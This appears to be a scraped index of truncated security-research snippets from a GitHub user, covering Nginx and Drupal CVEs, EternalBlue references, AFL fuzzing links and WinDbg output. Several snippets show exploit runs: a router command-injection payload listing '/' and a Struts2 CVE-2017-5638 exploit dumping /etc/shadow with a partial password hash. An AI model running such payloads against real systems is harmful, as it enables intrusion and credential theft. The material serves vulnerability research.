nixawk
nixawk
- https://www.python.org/dev/peps/pep-0008/ - https://google.github.io/styleguide/pyguide.html
## Description Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered...
## Description Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with...
``` $ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /" INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`; diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw bin boot bootimg dev etc home include initrd lib...
## References - https://zerosum0x0.blogspot.jp/2017/04/doublepulsar-initial-smb-backdoor-ring.html - https://zerosum0x0.blogspot.jp/2017/06/eternalblue-exploit-analysis-and-port.html - https://risksense.com/_api/filesystem/468/EternalBlue_RiskSense-Exploit-Analysis-and-Port-to-Microsoft-Windows-10_v1_2.pdf - https://www.exploit-db.com/docs/42329.pdf - https://github.com/worawit/MS17-010 - https://www.exploit-db.com/exploits/42315/ - https://github.com/omri9741/cve-2017-7494/ - https://github.com/CoreSecurity/impacket - https://github.com/CoreSecurity/impacket/blob/master/impacket/dcerpc/v5/epm.py - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb - https://msdn.microsoft.com/en-us//library/cc738291(v=ws.10).aspx - http://www.ampliasecurity.com/research/NTLMWeakNonce-bh2010-usa-ampliasecurity.pdf - https://www.coresecurity.com/corelabs-research/publications/new-smb-and-dcerpc-features-impacket-v0960 - http://www.rubydoc.info/github/rapid7/metasploit-framework/Msf/Exploit/Remote/DCERPC...
## Command Injection ``` echo "xxx.xxx.xxx.xxxUSER-AGENT" | md5sum ``` - xxx.xxx.xxx.xxx is your ip. - USER-AGENT can be a command injection @string. Send a http request with an command injection...
Add https support - https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py ``` $ python2.7 test.py https://192.168.1.100/ "cat /etc/shadow" [+] The target is vulnerable. [*] struts2-cmd $ cat /etc/shadow [*] root:$6$nK....9iIdLoX3VzX.U.:17221:0:99999:7::: bin:*:15513:0:99999:7::: daemon:*:15513:0:99999:7::: adm:*:15513:0:99999:7::: lp:*:15513:0:99999:7::: .... ```
 ``` *** wait with pending attach ************* Symbol Path validation summary ************** Response Time (ms) Location Deferred SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 2fe80000...
## AFL ``` - https://en.wikipedia.org/wiki/Fuzzing - https://en.wikipedia.org/wiki/Fuzz_testing - http://lcamtuf.coredump.cx/afl/ - http://lcamtuf.coredump.cx/afl/demo/ - http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt - http://lcamtuf.coredump.cx/afl/#bugs - http://lcamtuf.coredump.cx/afl/README.txt - http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz - http://lcamtuf.coredump.cx/afl/technical_details.txt - http://lcamtuf.blogspot.com/2014/08/binary-fuzzing-strategies-what-works.html - http://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html - http://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html - http://lcamtuf.blogspot.com/2014/11/afl-fuzz-crash-exploration-mode.html -...